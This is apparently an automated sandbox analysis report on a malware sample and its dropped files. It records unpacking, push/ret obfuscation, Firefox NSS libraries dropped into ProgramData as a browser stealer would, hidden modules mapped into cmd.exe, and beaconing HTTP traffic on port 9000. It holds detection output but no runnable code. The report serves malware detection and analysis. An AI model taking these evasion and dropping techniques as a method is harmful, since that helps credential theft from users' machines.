Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: P[<_C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: freebl3.pdbp source: freebl3.dll.2.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: I[L<C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp

Source: sx8RE6LbG0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: sx8RE6LbG0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: sx8RE6LbG0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: sx8RE6LbG0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: sx8RE6LbG0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Unpacked PE file: 2.2.u2ts.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Unpacked PE file: 0.2.sx8RE6LbG0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Unpacked PE file: 2.2.u2ts.0.exe.400000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

2_2_00416240

PE file contains an invalid checksum

Source: relay.dll.0.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: relay.dll.3.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: sx8RE6LbG0.exe	Static PE information: real checksum: 0x7dd33 should be: 0x7dd36
Source: dvffdl.4.dr	Static PE information: real checksum: 0x0 should be: 0xc411c

PE file contains sections with non-standard names

Source: u2ts.3.exe.0.dr	Static PE information: section name: .didata
Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.2.dr	Static PE information: section name: .didat
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.2.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0042786C push ecx; ret	0_2_0042787C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0042780C push eax; ret	0_2_0042782A
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0042E3A5 push esi; ret	0_2_0042E3AE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_00409D06 push ecx; ret	0_2_00409D19
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_004097B6 push ecx; ret	0_2_004097C9
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CE9120 push ecx; iretd	0_2_01CE9126
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CEA939 pushad ; retf	0_2_01CEA940
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CE808B pushad ; retf	0_2_01CE808C
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CEAF49 push 00000061h; retf	0_2_01CEAF51
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_01CEA623 push 2B991403h; ret	0_2_01CEA62A
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03691B72 push dword ptr [esp+ecx-75h]; iretd	0_2_03691B76
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0368C3FF push esp; retf	0_2_0368C407
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03697A73 push eax; ret	0_2_03697A91
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03679A1D push ecx; ret	0_2_03679A30
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03697AD3 push ecx; ret	0_2_03697AE3
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0368C9FD push esp; retf	0_2_0368C9FE
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_03679F6D push ecx; ret	0_2_03679F80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004176C5 push ecx; ret	2_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0020281F push esp; retn 0039h	3_2_00202820
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00201088 push esp; retn 0039h	3_2_00201089
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0035FAB6 push ecx; ret	3_2_0035FAC9
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0035FB55 push ecx; ret	3_2_0035FB68
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00201DA3 push esp; retn 0039h	3_2_00201DA4
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00210F0B push 8B003CD1h; retf	3_2_00210F10
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001FEF7F push esp; retf 0039h	3_2_001FEF80
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001FEFA7 push eax; retf 0039h	3_2_001FEFA8
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C8047D9 push ecx; ret	3_2_6C8047EC
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C806365 push ecx; ret	3_2_6C806378

Source: dvffdl.4.dr

Static PE information: section name: .text entropy: 6.816444465715168

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File created: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File created: C:\Users\user\AppData\Local\Temp\u2ts.2\relay.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File created: C:\Users\user\AppData\Local\Temp\u2ts.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\dvffdl	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File created: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\jipsoiol	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\dvffdl			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\jipsoiol			Jump to dropped file

Creates or modifies windows services

Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DVFFDL
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JIPSOIOL

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49805

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

0_2_00408761

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
